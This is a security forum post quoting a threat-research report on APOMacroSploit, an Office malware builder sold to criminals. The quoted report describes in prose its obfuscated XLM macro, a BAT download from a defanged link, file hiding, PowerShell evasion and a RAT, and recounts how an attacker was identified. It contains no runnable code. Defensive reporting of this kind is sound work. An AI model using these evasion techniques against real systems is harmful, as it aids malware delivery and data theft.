Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Malware Analysis
ApoMacroSploit : Apocalyptical FUD Race
Message
<blockquote data-quote="upnorth" data-source="post: 930950" data-attributes="member: 38832"><p>Quote: " At the end of November, Check Point Research detected a new Office malware builder called APOMacroSploit, which was implicated in multiple malicious emails to more than 80 customers worldwide. In our investigation, we found that this tool includes features to <strong><u>evade detection by Windows Defender and is updated daily</u></strong> to ensure low detection rates. In this article, we reveal the threat actors’ malicious intentions and disclose the real identity of one attacker. We reported this information to the relevant law enforcement authorities.</p><p></p><p>The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script. Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product. We followed multiple cases of attacks related to this tool, which we discuss here, and we describe a popular RAT used in this campaign to control the victim’s machine remotely and steal information. Approximately 40 different hackers are involved in this campaign, and utilize 100 different email senders in the attacks. Overall, our telemetry reports attacks occurred in more than 30 different countries.</p><p></p><p>The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt[.]ly. The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion. At this stage of the attack, the attackers made a key mistake. The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end. "</p><p></p><p>Quote : " Nitrix and Apocaliptique assist buyers with how to use the tool. Many of the customer nicknames visible on the download server were also found on the channel. For each customer, Apocaliptique and Nitrix created a BAT file to use in the attack (see the procedure description below): This screenshot shows that not only did these hackers sell their attack tools, but they also participated in building and hosting the malware.</p><p></p><p>After digging in <strong><u>Nitrix Twitter account</u></strong>, we finally obtained his identity: <strong><u>he revealed his actual name when he posted a picture of a ticket he bought for a concert in December 2014</u></strong>. "</p><p></p><p>Full source :</p><p>[URL unfurl="true"]https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/[/URL]</p></blockquote><p></p>
[QUOTE="upnorth, post: 930950, member: 38832"] Quote: " At the end of November, Check Point Research detected a new Office malware builder called APOMacroSploit, which was implicated in multiple malicious emails to more than 80 customers worldwide. In our investigation, we found that this tool includes features to [B][U]evade detection by Windows Defender and is updated daily[/U][/B] to ensure low detection rates. In this article, we reveal the threat actors’ malicious intentions and disclose the real identity of one attacker. We reported this information to the relevant law enforcement authorities. The malware infection begins when the dynamic content of the attached XLS document is enabled, and an XLM macro automatically starts downloading a Windows system command script. Based on the number of customers and the lowest option price for this product, we estimate that the two main threat actors made at least $5000 in 1.5 months, just by selling the APOMacroSploit product. We followed multiple cases of attacks related to this tool, which we discuss here, and we describe a popular RAT used in this campaign to control the victim’s machine remotely and steal information. Approximately 40 different hackers are involved in this campaign, and utilize 100 different email senders in the attacks. Overall, our telemetry reports attacks occurred in more than 30 different countries. The initial malicious document our customer received was an XLS file containing an obfuscated XLM macro called Macro 4.0. The macro is triggered automatically when the victim opens the document, and downloads a BAT file from cutt[.]ly. The execution of the command “attrib” enables the BAT script to hide in the victim’s machine. We assume the reordering of the PowerShell instructions via the Start-Sleep command (visible after deobfuscation) is seen by the attacker as another static evasion. At this stage of the attack, the attackers made a key mistake. The cutt[.]ly domain directly redirects to a download server and does not perform the request on the back end. " Quote : " Nitrix and Apocaliptique assist buyers with how to use the tool. Many of the customer nicknames visible on the download server were also found on the channel. For each customer, Apocaliptique and Nitrix created a BAT file to use in the attack (see the procedure description below): This screenshot shows that not only did these hackers sell their attack tools, but they also participated in building and hosting the malware. After digging in [B][U]Nitrix Twitter account[/U][/B], we finally obtained his identity: [B][U]he revealed his actual name when he posted a picture of a ticket he bought for a concert in December 2014[/U][/B]. " Full source : [URL unfurl="true"]https://research.checkpoint.com/2021/apomacrosploit-apocalyptical-fud-race/[/URL] [/QUOTE]
Insert quotes…
Verification
Post reply
Top
